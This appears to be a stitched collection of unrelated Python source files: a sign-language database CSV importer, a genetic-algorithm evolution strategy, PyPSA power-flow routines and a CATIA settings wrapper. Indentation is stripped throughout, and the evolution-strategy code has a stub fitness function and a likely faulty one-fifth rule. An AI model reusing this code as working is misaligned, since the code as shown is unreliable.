# Skip above fields with complex values: Keywords, Signlanguages, Dialects, Relations to other signs, Relations to foreign signs, Morphology.
# print('Skipping unknown field name: (', human_key, ')')
error_string = 'For ' + default_annotationidglosstranslation + ' (' + str(
gloss_id) + '), could not identify column name: ' + str(human_key)
errors_found += [error_string]
if not column_name_error:
# error_string = 'Allowed column names are: ' + allowed_columns
error_string = 'HINT: Try exporting a CSV file to see what column names can be used.'
errors_found += [error_string]
column_name_error = True
continue
# print('SUCCESS: human_key (', human_key, '), machine_key: (', machine_key, '), new_human_value: (', new_human_value, ')')
#Try to translate the value to machine values if needed
if hasattr(field, 'field_choice_category'):
field_choices = build_choice_list(field.field_choice_category)
human_to_machine_values = {human_value: machine_value for machine_value, human_value in field_choices}
if new_human_value in ['', '0', ' ', None, 'None']:
# print('exception in new human value to machine value: ', new_human_value)
new_human_value = '-'
new_machine_value = None
# print('Import CSV: human_to_machine_values: ', human_to_machine_values)
# Because some Handshape names can start with =, a special character ' is tested for in the name
if new_human_value[:1] == '\'':
new_human_value = new_human_value[1:]
# print('Value started with single quote, revised human value: ', new_human_value)
if new_human_value in human_to_machine_values.keys():
new_machine_value = human_to_machine_values[new_human_value]
else:
new_machine_value = '0'
error_string = 'For ' + default_annotationidglosstranslation + ' (' + str(
gloss_id) + '), could not find option ' + str(new_human_value) + ' for ' + human_key
errors_found += [error_string]
continue
#Do something special for integers and booleans
elif field.__class__.__name__ == 'IntegerField':
try:
new_machine_value = int(new_human_value)
except ValueError:
new_human_value = 'None'
new_machine_value = None
elif field.__class__.__name__ == 'NullBooleanField':
new_human_value_lower = new_human_value.lower()
if new_human_value_lower == 'neutral' and (field.name in settings.HANDEDNESS_ARTICULATION_FIELDS):
new_machine_value = None
elif new_human_value_lower in ['true', 'yes', '1']:
new_machine_value = True
new_human_value = 'True'
elif new_human_value_lower == 'none':
new_machine_value = None
elif new_human_value_lower in ['false', 'no', '0']:
new_machine_value = False
new_human_value = 'False'
else:
# Boolean expected
error_string = ''
# If the new value is empty, don't count this as a type error, error_string is generated conditionally
if field.name in settings.HANDEDNESS_ARTICULATION_FIELDS:
if new_human_value != None and new_human_value != '' and new_human_value != 'None':
error_string = 'For ' + default_annotationidglosstranslation + ' (' + str(gloss_id) + '), value ' + str(new_human_value) + ' for ' + human_key + ' should be a Boolean or Neutral.'
else:
if new_human_value != None and new_human_value != '' and new_human_value != 'None':
error_string = 'For ' + default_annotationidglosstranslation + ' (' + str(gloss_id) + '), value ' + str(new_human_value) + ' for ' + human_key + ' is not a Boolean.'
if error_string:
errors_found += [error_string]
continue
#If all the above does not apply, this is a None value or plain text
else:
if new_human_value == 'None':
new_machine_value = None
else:
new_machine_value = new_human_value
#Try to translate the key to machine keys if possible
try:
# print('get original machine value gloss ', gloss_id, ' machine_key ', machine_key)
original_machine_value = getattr(gloss,machine_key)
# print('original value for field ', machine_key, ' for gloss ', gloss_id)
except:
error_string = 'For ' + default_annotationidglosstranslation + ' (' + str(
gloss_id) + '), could not get original value for field: ' + str(machine_key)
errors_found += [error_string]
continue
# elif field.__class__.__name__ == 'NullBooleanField':
#
# new_human_value_lower = new_human_value.lower()
# if new_human_value_lower == 'neutral' and (field.name in settings.HANDEDNESS_ARTICULATION_FIELDS):
# new_machine_value = None
# elif new_human_value_lower in ['true', 'yes', '1']:
# new_machine_value = True
# new_human_value = 'True'
# elif new_human_value_lower == 'none':
# new_machine_value = None
# elif new_human_value_lower in ['false', 'no', '0']:
# new_machine_value = False
# new_human_value = 'False'
#Translate back the machine value from the gloss
try:
# if original_machine_value is None:
# print(gloss_id, field.name, ' original machine value is None ', original_machine_value)
# original_machine_value = '0'
if hasattr(field, 'field_choice_category'):
# print('gloss ', gloss.__dict__)
original_machine_value = getattr(gloss, machine_key)
if original_machine_value is None:
original_machine_value = '0'
# else:
# original_machine_value = str(original_machine_value)
# print(gloss_id, ' compare original ', field.name, ' original ', original_machine_value, ' new ', new_machine_value)
field_choices = build_choice_list(field.field_choice_category)
# print('field choices: ', field_choices)
try:
original_human_value = dict(field_choices)[original_machine_value]
except:
original_human_value = '-'
print('CSV Update: Original machine value for gloss ', gloss_id, ' has an undefined choice for field ', field.name, ': ', original_machine_value)
original_machine_value = '0'
# original_human_value = getattr(gloss, 'get_' + field.name + '_display')()
# print(gloss_id, ' compare original ', field.name, ' original ', original_machine_value, ' human ', original_human_value)
elif field.__class__.__name__ == 'NullBooleanField':
# print('compare original ', field.name, ' original ', original_machine_value, ' new ', new_machine_value)
if original_machine_value is None and (field.name in settings.HANDEDNESS_ARTICULATION_FIELDS):
original_human_value = 'Neutral'
elif original_machine_value:
original_machine_value = True
original_human_value = 'True'
else:
original_machine_value = False
original_human_value = 'False'
# some legacy glosses have empty text fields of other formats
elif (field.__class__.__name__ == 'CharField' or field.__class__.__name__ == 'TextField') \
and (original_machine_value is None or original_machine_value == '-' or original_machine_value == '------' or original_machine_value == ' '):
# print(gloss_id, ' replace with empty string: ', original_machine_value)
original_machine_value = ''
original_human_value = ''
else:
value = getattr(gloss, field.name)
original_human_value = value
except:
# print('exception trying to get field choices for ', field.name)
original_human_value = '-'
error_string = 'For ' + default_annotationidglosstranslation + ' (' + str(
gloss_id) + '), could not get choice for field '+field.verbose_name+': ' + str(original_machine_value)
errors_found += [error_string]
continue
#Remove any weird char
try:
new_human_value = unescape(new_human_value)
except:
print('unescape raised exception for new_human_value: ', new_human_value)
pass
# test if blank value
original_human_value = str(original_human_value)
new_human_value = str(new_human_value)
# print("Hex values for machine key: ", machine_key)
# print('Hex original: (', ", ".join([hex(ord(x)) for x in original_human_value]), ')')
# print('Hex new: (', ", ".join([hex(ord(x)) for x in new_human_value]), ')')
s1 = re.sub(' ','',original_human_value)
s2 = re.sub(' ','',new_human_value)
# If the original value is implicitly not set, and the new value is not set, ignore this change
if (s1 == '' or s1 == 'None' or s1 == 'False') and s2 == '':
pass
#Check for change, and save your findings if there is one
elif original_machine_value != new_machine_value and new_machine_value != None:
# print('for human key: ', human_key)
# print('different: original_machine_value: ', original_machine_value, ', new machine value: ', new_machine_value)
# print('different: original_human_value: ', original_human_value, ', new human value: ', new_human_value)
if (human_key == 'WD' or human_key == 'WP') and original_human_value == 'None':
original_human_value = 'Neutral'
differences.append({'pk':gloss_id,
'dataset': current_dataset,
'annotationidglosstranslation':default_annotationidglosstranslation,
'machine_key':machine_key,
'human_key':human_key,
'original_machine_value':original_machine_value,
'original_human_value':original_human_value,
'new_machine_value':new_machine_value,
'new_human_value':new_human_value})
return (differences, errors_found, earlier_updates_same_csv, earlier_updates_lemmaidgloss)
def compare_valuedict_to_lemma(valuedict,lemma_id,my_datasets, nl,
lemmaidglosstranslations, current_lemmaidglosstranslations,
earlier_updates_same_csv, earlier_updates_lemmaidgloss):
"""Takes a dict of key-value pairs, and compares them to a lemma"""
errors_found = []
differences = []
try:
lemma = LemmaIdgloss.objects.select_related().get(pk=lemma_id)
except ObjectDoesNotExist as e:
e = 'Could not find lemma for ID ' + str(lemma_id)
errors_found.append(e)
return (differences, errors_found, earlier_updates_same_csv, earlier_updates_lemmaidgloss)
if lemma_id in earlier_updates_same_csv:
e = 'Lemma ID (' + str(lemma_id) + ') found in multiple rows (Row ' + str(nl + 1) + ').'
errors_found.append(e)
return (differences, errors_found, earlier_updates_same_csv, earlier_updates_lemmaidgloss)
else:
earlier_updates_same_csv.append(lemma_id)
count_new_nonempty_translations = 0
count_existing_nonempty_translations = 0
if lemmaidglosstranslations \
and current_lemmaidglosstranslations != lemmaidglosstranslations:
for key1 in lemmaidglosstranslations.keys():
if lemmaidglosstranslations[key1]:
count_new_nonempty_translations += 1
for key2 in current_lemmaidglosstranslations.keys():
if current_lemmaidglosstranslations[key2]:
count_existing_nonempty_translations += | |
<reponame>ignacioct/GeneticAlgorithms
import copy
import math
import operator
import random
import sys
from concurrent import futures
import numpy as np
import requests
class FitnessFunctionCaller:
"""Class for returning the fitness function of an individual."""
def __init__(self, *args):
functional_parts = []
# Full case with 10 motors
if len(args) > 0:
for arg in args:
functional_parts.append(arg)
def call(self) -> float:
"""Returns the fitness function"""
return 1# Fitness function
class Individual:
"""Candidate solution to the problem. Made by a functional value and a variance."""
def __init__(self, is10, **kwargs):
functional = kwargs.get("functional", None)
variance = kwargs.get("variance", None)
self.is10 = is10
if is10 is False:
self.motorNumber = 4
else:
self.motorNumber = 10
if len(kwargs) == 0:
self.functional = [
np.random.uniform(-180, 181) for _ in range(self.motorNumber)
]
self.variance = [
np.random.uniform(100, 360) for _ in range(self.motorNumber)
]
else:
self.functional = functional
self.variance = variance
self.fitness = sys.float_info.max # irrational high value
def update_fitness(self, incoming):
"""Update fitness function"""
self.fitness = incoming
def update_variance(self, incoming):
"""Update variance function"""
for i in range(self.motorNumber):
self.variance[i] = incoming[i]
class EvolutiveStrategyOneIndividual:
"""Evolution strategy made only one solution with mutation."""
def __init__(self, c, is10):
self.population = 1
self.pool = []
for _ in range(self.population): # reusable for bigger populations
indv = Individual(is10)
self.pool.append(indv)
self.successes = [] # 1 if improves, otherwise 0
self.psi = (
self.successes.count(1) / 10
) # ratio of improvement in the last 10 generations
self.c = c # coefficient for 1/5 rule
self.evaluations = 0
self.lastFitness = sys.float_info.max # irrational high value
def mutation(self):
"""A temporal solution is produced, being the second individual the result of the mutation"""
# Creating temporal dictionaries
self.temporalPool = []
temporal_functional = []
temporal_variance = []
for i in range(self.pool[0].motorNumber):
# Functional mutation
temporal_functional.append(
self.pool[0].functional[i]
+ np.random.normal(scale=self.pool[0].variance[i])
)
temp_indv = Individual(
is10=self.pool[0].is10,
functional=temporal_functional,
variance=self.pool[0].variance,
)
self.temporalPool.append(temp_indv)
def evaluation(self):
"""Selecting the best of the two individual and evaluating them"""
# Getting the fitness evaluations of the former individual and the mutated one
formerIndividualCaller = FitnessFunctionCaller(*(i for i in self.pool[0].functional))
temporalIndividualCaller = FitnessFunctionCaller(
*(i for i in self.temporalPool[0].functional)
)
formerIndividualFitness = formerIndividualCaller.call()
temporalIndividualFitness = temporalIndividualCaller.call()
self.evaluations += 2
# formerBetter is True if the mutation did not improve the fitness over the father
if formerIndividualFitness <= temporalIndividualFitness:
formerBetter = True
else:
formerBetter = False
# bestFitness in between former and temporal
bestFitness = min(formerIndividualFitness, temporalIndividualFitness)
# If the child did improved, we change the pool to the temporal pool
if formerBetter is False:
self.pool = copy.deepcopy(self.temporalPool)
# In any case, we delete the temporal pool at this point
del self.temporalPool
# Variance mutation
for i in range(self.pool[0].motorNumber):
self.pool[0].variance[i] = self.ruleOneFifth(self.pool[0].variance[i])
# Update fitness function
self.pool[0].update_fitness(bestFitness)
# Adding 1 to the success matrix if the best individual is the child
if formerBetter is True:
if len(self.successes) < 10:
self.successes.append(0)
else:
self.successes.pop(0)
self.successes.append(0)
else:
if len(self.successes) < 10:
self.successes.append(1)
else:
self.successes.pop(0)
self.successes.append(1)
# Updating last fitness
self.lastFitness = bestFitness
# Update psi
self.psi = (
self.successes.count(1) / 10
) # ratio of improvement in the last 10 generations
def trainingLoop(self, maxCycles):
"""Training loop, controlled at maximum by the last cicle"""
for cycle in range(maxCycles):
self.mutation()
self.evaluation()
formerResults = []
if len(formerResults) > 10:
formerResults.pop(0)
formerResults.append(
"Generation: "
+ str(cycle)
+ "\tBest fitness: "
+ str(self.pool[0].fitness)
+ "\nBest chromosome: "
+ str(self.pool[0].functional)
)
print(
"Generation: "
+ str(cycle)
+ "\tBest fitness: "
+ str(self.pool[0].fitness)
+ "\nBest chromosome: "
+ str(self.pool[0].functional)
)
stopping = False
for i in range(len(self.pool[0].functional)):
if self.pool[0].variance[i] < 0.0001:
stopping = True
if stopping == True:
print("Early stopping applied")
print(formerResults[0])
break
def ruleOneFifth(self, formerVariance) -> float:
"""Applies the one fifth rule given the former variance"""
# Update psi
self.psi = (
self.successes.count(1) / 10
) # ratio of improvement in the last 10 generations
if self.psi < 0.2:
return self.c * formerVariance
elif self.psi > 0.2:
return self.c / formerVariance
else:
return formerVariance
class EvolutiveStrategyMultiple:
"""Evolution strategy made with a population of individuals."""
def __init__(self, population, family_number, tournament_factor, is10):
self.population = population
self.pool = []
for _ in range(self.population):
indv = Individual(is10)
self.pool.append(indv)
self.family_number = family_number
self.tau = 1 / math.sqrt(2 * math.sqrt(self.pool[0].motorNumber))
self.zero_tau = 1 / math.sqrt(2 * self.pool[0].motorNumber)
self.tournament_factor = tournament_factor
self.evaluations = 0
def element_per_list(self, lista):
"""Auxiliar function; given a list of lists, picks a random for each position searching in all lists"""
temporal_list = []
for position in range(len(lista[0])):
rnd = random.randint(0, (self.family_number - 1))
temporal_list.append(lista[rnd][position])
return temporal_list
def tournament(self):
"""
Selects the best individuals by facing them to each other and keeping the best.
Returns a population of the best inidividuals
"""
len_population = self.family_number * self.population
temp_population = [] # Temporal place for the newly-created population
for _ in range(len_population):
# Get tournament size as the floored integer of the Population Size * Tournament Percentage (aka factor)
tournament_size = math.floor(self.tournament_factor * self.population)
# Selects a random fraction of the total population to participate in the tournament
tournament_selected = random.sample(range(self.population), tournament_size)
# Choose the fittest
fitnesses = []
indexes = []
for index in tournament_selected:
fitnesses.append(self.pool[index].fitness)
indexes.append(index)
fittest_index = indexes[fitnesses.index(min(fitnesses))]
fittest = self.pool[fittest_index]
temp_population.append(fittest)
return temp_population # Returning the new population
def crossover(self, pool):
"""Returns a pool of children, given a the pool of individuals of the last generation and a family number."""
temporal_pool = []
random.shuffle(pool) # randomize the pool of individuals, to randomize crossover
counter = 0 # controls the loops logic
avg_functionals = [0] * pool[0].motorNumber # functional list for the newborns (must be restarted with 0-init)
avg_variances = ([]) # variances list for the newborns (must be restarted by recasting)
for indv in pool:
if counter != (self.family_number - 1): # not the last member of the family
for position in range(indv.motorNumber):
avg_functionals[position] += indv.functional[position] # adds each functional of the current ind to corresponding positions
avg_variances.append(indv.variance) # adds the variance to the list of parent variances
counter += 1
else: # last member of the family -> extra functions
for position in range(indv.motorNumber):
avg_functionals[position] += indv.functional[position]
avg_functionals[
position
] /= (
self.family_number
) # no more sums left, time to divide by family number
avg_variances.append(indv.variance)
# Transforming the list of lists to a list of variances, with a random variance of the parents for each position
avg_variances = self.element_per_list(avg_variances)
# Adding the individual to the temporal pool
temp_indv = Individual(
is10=pool[0].is10,
functional=avg_functionals,
variance=avg_variances,
)
temporal_pool.append(temp_indv)
# Restarting variables, as this family has finished
counter = 0
avg_functionals = [0] * pool[0].motorNumber
avg_variances = []
"""
With this implementation, if population mod family number is not zero, those parents at the end wont create any child.
To cope with that, the parents pool is shuffled. This should not be a problem, just 1 or 2 will be excluded.
At the end, we get the same number of children, so the rest of the operators remain unchanged, and convergence will work just fine.
"""
return temporal_pool
def mutation(self, pool, scaling):
"""
Given a pool of individuals, mutates all individuals
functionals get mutated by a Gaussian distribution
variances get decreased by a Gaussian scheme
"""
for individual in pool:
for i in range(individual.motorNumber):
# Functional mutation
individual.functional[i] += np.random.normal(
loc=0, scale=individual.variance[i]
)
# Variance mutation
if scaling is True:
individual.variance[i] = (
individual.variance[i]
* np.exp(np.random.normal(loc=0, scale=self.tau))
* np.exp(np.random.normal(loc=0, scale=self.zero_tau))
)
else:
individual.variance[i] = individual.variance[i] * np.exp(
np.random.normal(loc=0, scale=self.tau)
)
return pool
def concurrent_evaluation(self, pool):
"""Given a pool of individuals, return a list with its fitness functions"""
callers = [] # list of caller objects of individuals
for individual in pool:
individual_caller = FitnessFunctionCaller(*(i for i in individual.functional))
callers.append(individual_caller)
with futures.ThreadPoolExecutor(max_workers=50) as execute:
future = [execute.submit(callers[i].call) for i in range(len(pool))]
self.evaluations += len(future)
fitnesses = [f.result() for f in future] # list of fitness of the pool
return fitnesses
def selection(self, children_pool):
"""Given a pool of mutated children, and using self.pool (parent's pool), selects the best individuals"""
fitnesses = []
combined_pool = copy.deepcopy(
self.pool
) # introducing parents to a combined pool
combined_pool.extend(children_pool) | |
<reponame>henri-chat-noir/PyPSA-Docs-Staging<filename>pypsa/pf.py
## Copyright 2015-2021 PyPSA Developers
## You can find the list of PyPSA Developers at
## https://pypsa.readthedocs.io/en/latest/developers.html
## PyPSA is released under the open source MIT License, see
## https://github.com/PyPSA/PyPSA/blob/master/LICENSE.txt
"""Power flow functionality.
"""
__author__ = "PyPSA Developers, see https://pypsa.readthedocs.io/en/latest/developers.html"
__copyright__ = ("Copyright 2015-2021 PyPSA Developers, see https://pypsa.readthedocs.io/en/latest/developers.html, "
"MIT License")
import logging
logger = logging.getLogger(__name__)
from scipy.sparse import issparse, csr_matrix, csc_matrix, hstack as shstack, vstack as svstack, dok_matrix
from numpy import r_, ones
from scipy.sparse.linalg import spsolve
from numpy.linalg import norm
from pandas.api.types import is_list_like
import numpy as np
import pandas as pd
import networkx as nx
from operator import itemgetter
import time
from .descriptors import get_switchable_as_dense, allocate_series_dataframes, Dict, zsum, degree
pd.Series.zsum = zsum
def normed(s): return s/s.sum()
def real(X): return np.real(X.to_numpy())
def imag(X): return np.imag(X.to_numpy())
def _as_snapshots(network, snapshots):
if snapshots is None:
snapshots = network.snapshots
if not is_list_like(snapshots):
snapshots = pd.Index([snapshots])
if not isinstance(snapshots, pd.MultiIndex):
snapshots = pd.Index(snapshots)
assert snapshots.isin(network.snapshots).all()
return snapshots
def _allocate_pf_outputs(network, linear=False):
to_allocate = {'Generator': ['p'],
'Load': ['p'],
'StorageUnit': ['p'],
'Store': ['p'],
'ShuntImpedance': ['p'],
'Bus': ['p', 'v_ang', 'v_mag_pu'],
'Line': ['p0', 'p1'],
'Transformer': ['p0', 'p1'],
'Link': ["p"+col[3:] for col in network.links.columns if col[:3] == "bus"]}
if not linear:
for component, attrs in to_allocate.items():
if "p" in attrs:
attrs.append("q")
if "p0" in attrs and component != 'Link':
attrs.extend(["q0","q1"])
allocate_series_dataframes(network, to_allocate)
def _calculate_controllable_nodal_power_balance(sub_network, network, snapshots, buses_o):
for n in ("q", "p"):
# allow all one ports to dispatch as set
for c in sub_network.iterate_components(network.controllable_one_port_components):
c_n_set = get_switchable_as_dense(network, c.name, n + '_set', snapshots, c.ind)
c.pnl[n].loc[snapshots, c.ind] = c_n_set
# set the power injection at each node from controllable components
network.buses_t[n].loc[snapshots, buses_o] = \
sum([((c.pnl[n].loc[snapshots, c.ind] * c.df.loc[c.ind, 'sign'])
.groupby(c.df.loc[c.ind, 'bus'], axis=1).sum()
.reindex(columns=buses_o, fill_value=0.))
for c in sub_network.iterate_components(network.controllable_one_port_components)])
if n == "p":
network.buses_t[n].loc[snapshots, buses_o] += sum(
[(- c.pnl[n+str(i)].loc[snapshots].groupby(c.df["bus"+str(i)], axis=1).sum()
.reindex(columns=buses_o, fill_value=0))
for c in network.iterate_components(network.controllable_branch_components)
for i in [int(col[3:]) for col in c.df.columns if col[:3] == "bus"]])
def _network_prepare_and_run_pf(network, snapshots, skip_pre, linear=False,
distribute_slack=False, slack_weights='p_set', **kwargs):
if linear:
sub_network_pf_fun = sub_network_lpf
sub_network_prepare_fun = calculate_B_H
else:
sub_network_pf_fun = sub_network_pf
sub_network_prepare_fun = calculate_Y
if not skip_pre:
network.determine_network_topology()
calculate_dependent_values(network)
_allocate_pf_outputs(network, linear)
snapshots = _as_snapshots(network, snapshots)
#deal with links
if not network.links.empty:
p_set = get_switchable_as_dense(network, 'Link', 'p_set', snapshots)
network.links_t.p0.loc[snapshots] = p_set.loc[snapshots]
for i in [int(col[3:]) for col in network.links.columns if col[:3] == "bus" and col != "bus0"]:
eff_name = "efficiency" if i == 1 else "efficiency{}".format(i)
efficiency = get_switchable_as_dense(network, 'Link', eff_name, snapshots)
links = network.links.index[network.links["bus{}".format(i)] != ""]
network.links_t['p{}'.format(i)].loc[snapshots, links] = -network.links_t.p0.loc[snapshots, links]*efficiency.loc[snapshots, links]
itdf = pd.DataFrame(index=snapshots, columns=network.sub_networks.index, dtype=int)
difdf = pd.DataFrame(index=snapshots, columns=network.sub_networks.index)
cnvdf = pd.DataFrame(index=snapshots, columns=network.sub_networks.index, dtype=bool)
for sub_network in network.sub_networks.obj:
if not skip_pre:
find_bus_controls(sub_network)
branches_i = sub_network.branches_i()
if len(branches_i) > 0:
sub_network_prepare_fun(sub_network, skip_pre=True)
if isinstance(slack_weights, dict):
sn_slack_weights = slack_weights[sub_network.name]
else:
sn_slack_weights = slack_weights
if isinstance(sn_slack_weights, dict):
sn_slack_weights = pd.Series(sn_slack_weights)
if not linear:
# escape for single-bus sub-network
if len(sub_network.buses()) <= 1:
itdf[sub_network.name],\
difdf[sub_network.name],\
cnvdf[sub_network.name] = sub_network_pf_singlebus(sub_network, snapshots=snapshots, skip_pre=True,
distribute_slack=distribute_slack,
slack_weights=sn_slack_weights)
else:
itdf[sub_network.name],\
difdf[sub_network.name],\
cnvdf[sub_network.name] = sub_network_pf_fun(sub_network, snapshots=snapshots,
skip_pre=True, distribute_slack=distribute_slack,
slack_weights=sn_slack_weights, **kwargs)
else:
sub_network_pf_fun(sub_network, snapshots=snapshots, skip_pre=True, **kwargs)
if not linear:
return Dict({ 'n_iter': itdf, 'error': difdf, 'converged': cnvdf })
def network_pf(network, snapshots=None, skip_pre=False, x_tol=1e-6, use_seed=False,
distribute_slack=False, slack_weights='p_set'):
"""
Full non-linear power flow for generic network.
Parameters
----------
snapshots : list-like|single snapshot
A subset or an elements of network.snapshots on which to run
the power flow, defaults to network.snapshots
skip_pre : bool, default False
Skip the preliminary steps of computing topology, calculating dependent values and finding bus controls.
x_tol: float
Tolerance for Newton-Raphson power flow.
use_seed : bool, default False
Use a seed for the initial guess for the Newton-Raphson algorithm.
distribute_slack : bool, default False
If ``True``, distribute the slack power across generators proportional to generator dispatch by default
or according to the distribution scheme provided in ``slack_weights``.
If ``False`` only the slack generator takes up the slack.
slack_weights : dict|str, default 'p_set'
Distribution scheme describing how to determine the fraction of the total slack power
(of each sub network individually) a bus of the subnetwork takes up.
Default is to distribute proportional to generator dispatch ('p_set').
Another option is to distribute proportional to (optimised) nominal capacity ('p_nom' or 'p_nom_opt').
Custom weights can be specified via a dictionary that has a key for each
subnetwork index (``network.sub_networks.index``) and a
pandas.Series/dict with buses or generators of the
corresponding subnetwork as index/keys.
When specifying custom weights with buses as index/keys the slack power of a bus is distributed
among its generators in proportion to their nominal capacity (``p_nom``) if given, otherwise evenly.
Returns
-------
dict
Dictionary with keys 'n_iter', 'converged', 'error' and dataframe
values indicating number of iterations, convergence status, and
iteration error for each snapshot (rows) and sub_network (columns)
"""
return _network_prepare_and_run_pf(network, snapshots, skip_pre, linear=False, x_tol=x_tol,
use_seed=use_seed, distribute_slack=distribute_slack,
slack_weights=slack_weights)
def newton_raphson_sparse(f, guess, dfdx, x_tol=1e-10, lim_iter=100, distribute_slack=False, slack_weights=None):
"""Solve f(x) = 0 with initial guess for x and dfdx(x). dfdx(x) should
return a sparse Jacobian. Terminate if error on norm of f(x) is <
x_tol or there were more than lim_iter iterations.
"""
slack_args = {"distribute_slack": distribute_slack,
"slack_weights": slack_weights}
converged = False
n_iter = 0
F = f(guess, **slack_args)
diff = norm(F,np.Inf)
logger.debug("Error at iteration %d: %f", n_iter, diff)
while diff > x_tol and n_iter < lim_iter:
n_iter +=1
guess = guess - spsolve(dfdx(guess, **slack_args),F)
F = f(guess, **slack_args)
diff = norm(F,np.Inf)
logger.debug("Error at iteration %d: %f", n_iter, diff)
if diff > x_tol:
logger.warning("Warning, we didn't reach the required tolerance within %d iterations, error is at %f. See the section \"Troubleshooting\" in the documentation for tips to fix this. ", n_iter, diff)
elif not np.isnan(diff):
converged = True
return guess, n_iter, diff, converged
def sub_network_pf_singlebus(sub_network, snapshots=None, skip_pre=False,
distribute_slack=False, slack_weights='p_set', linear=False):
"""
Non-linear power flow for a sub-network consiting of a single bus.
Parameters
----------
snapshots : list-like|single snapshot
A subset or an elements of network.snapshots on which to run
the power flow, defaults to network.snapshots
skip_pre: bool, default False
Skip the preliminary steps of computing topology, calculating dependent values and finding bus controls.
distribute_slack : bool, default False
If ``True``, distribute the slack power across generators proportional to generator dispatch by default
or according to the distribution scheme provided in ``slack_weights``.
If ``False`` only the slack generator takes up the slack.
slack_weights : pandas.Series|str, default 'p_set'
Distribution scheme describing how to determine the fraction of the total slack power
a bus of the subnetwork takes up. Default is to distribute proportional to generator dispatch
('p_set'). Another option is to distribute proportional to (optimised) nominal capacity ('p_nom' or 'p_nom_opt').
Custom weights can be provided via a pandas.Series/dict
that has the generators of the single bus as index/keys.
"""
snapshots = _as_snapshots(sub_network.network, snapshots)
network = sub_network.network
logger.info("Balancing power on single-bus sub-network {} for snapshots {}".format(sub_network, snapshots))
if not skip_pre:
find_bus_controls(sub_network)
_allocate_pf_outputs(network, linear=False)
if isinstance(slack_weights, dict):
slack_weights = pd.Series(slack_weights)
buses_o = sub_network.buses_o
_calculate_controllable_nodal_power_balance(sub_network, network, snapshots, buses_o)
v_mag_pu_set = get_switchable_as_dense(network, 'Bus', 'v_mag_pu_set', snapshots)
network.buses_t.v_mag_pu.loc[snapshots,sub_network.slack_bus] = v_mag_pu_set.loc[:,sub_network.slack_bus]
network.buses_t.v_ang.loc[snapshots,sub_network.slack_bus] = 0.
if distribute_slack:
for bus, group in sub_network.generators().groupby('bus'):
if slack_weights in ['p_nom', 'p_nom_opt']:
assert not all(network.generators[slack_weights]) == 0, "Invalid slack weights! Generator attribute {} is always zero.".format(slack_weights)
bus_generator_shares = network.generators[slack_weights].loc[group.index].pipe(normed).fillna(0)
elif slack_weights == 'p_set':
generators_t_p_choice = get_switchable_as_dense(network, 'Generator', slack_weights, snapshots)
assert not generators_t_p_choice.isna().all().all(), "Invalid slack weights! Generator attribute {} is always NaN.".format(slack_weights)
assert not (generators_t_p_choice == 0).all().all(), "Invalid slack weights! Generator attribute {} is always zero.".format(slack_weights)
bus_generator_shares = generators_t_p_choice.loc[snapshots,group.index].apply(normed, axis=1).fillna(0)
else:
bus_generator_shares = slack_weights.pipe(normed).fillna(0)
network.generators_t.p.loc[snapshots,group.index] += bus_generator_shares.multiply(-network.buses_t.p.loc[snapshots,bus], axis=0)
else:
network.generators_t.p.loc[snapshots,sub_network.slack_generator] -= network.buses_t.p.loc[snapshots,sub_network.slack_bus]
network.generators_t.q.loc[snapshots,sub_network.slack_generator] -= network.buses_t.q.loc[snapshots,sub_network.slack_bus]
network.buses_t.p.loc[snapshots,sub_network.slack_bus] = 0.
network.buses_t.q.loc[snapshots,sub_network.slack_bus] = 0.
return 0, 0., True # dummy substitute for newton raphson output
def sub_network_pf(sub_network, snapshots=None, skip_pre=False, x_tol=1e-6, use_seed=False,
distribute_slack=False, slack_weights='p_set'):
"""
Non-linear power flow for connected sub-network.
Parameters
----------
snapshots : list-like|single snapshot
A subset or an elements of network.snapshots on which to run
the power flow, defaults to network.snapshots
skip_pre: bool, default False
Skip the preliminary steps of computing topology, calculating dependent values and finding bus controls.
x_tol: float
Tolerance for Newton-Raphson power flow.
use_seed : bool, default False
Use a seed for the initial guess for the Newton-Raphson algorithm.
distribute_slack : bool, default False
If ``True``, distribute the slack power across generators proportional to | |
value: bool):
"""
:param bool value:
"""
self.part_infrastructure_setting_att.NewWith3DSupport = value
@property
def new_with_axis_system(self) -> bool:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384)
| o Property NewWithAxisSystem() As boolean
|
| Returns or sets the "NewWithAxisSystem" parameter.
| Role: This parameter determines if a new .CATPart document will be created
| with an Axis System.
|
| Parameters:
|
| oAxisSystemCreated
| Current "NewWithAxisSystem" parameter's value:
|
| TRUE or 1 if an axis system is created,
| FALSE or 0 otherwise.
|
| Returns:
| S_OK if the parameter is correctly retrieved, E_FAIL otherwise.
:return: bool
:rtype: bool
"""
return self.part_infrastructure_setting_att.NewWithAxisSystem
@new_with_axis_system.setter
def new_with_axis_system(self, value: bool):
"""
:param bool value:
"""
self.part_infrastructure_setting_att.NewWithAxisSystem = value
@property
def new_with_gs(self) -> bool:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384)
| o Property NewWithGS() As boolean
|
| Returns or sets the "NewWithGS" parameter.
| Role: This parameter determines if a new .CATPart document will be created
| with a Geometrical Set.
|
| Parameters:
|
| oGSCreated
| Current "NewWithGS" parameter's value:
|
| TRUE or 1 if a G.S. is created,
| FALSE or 0 otherwise.
|
| Returns:
| S_OK if the parameter is correctly retrieved, E_FAIL otherwise.
:return: bool
:rtype: bool
"""
return self.part_infrastructure_setting_att.NewWithGS
@new_with_gs.setter
def new_with_gs(self, value: bool):
"""
:param bool value:
"""
self.part_infrastructure_setting_att.NewWithGS = value
@property
def new_with_ogs(self) -> bool:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384)
| o Property NewWithOGS() As boolean
|
| Returns or sets the "NewWithOGS" parameter.
| Role: This parameter determines if a new .CATPart document will be created
| with an Ordered Geometrical Set.
|
| Parameters:
|
| oOGSCreated
| Current "NewWithOGS" parameter's value:
|
| TRUE or 1 if an O.G.S. is created,
| FALSE or 0 otherwise.
|
| Returns:
| S_OK if the parameter is correctly retrieved, E_FAIL otherwise.
:return: bool
:rtype: bool
"""
return self.part_infrastructure_setting_att.NewWithOGS
@new_with_ogs.setter
def new_with_ogs(self, value: bool):
"""
:param bool value:
"""
self.part_infrastructure_setting_att.NewWithOGS = value
@property
def new_with_panel(self) -> bool:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384)
| o Property NewWithPanel() As boolean
|
| Returns or sets the "NewWithPanel" parameter.
| Role: This parameter determines if a dedicated 'New Part' panel is
| displayed when createing a new .CATPart document.
|
| Parameters:
|
| oNewPartPanelDisplayed
| Current "NewWithPanel" parameter's value:
|
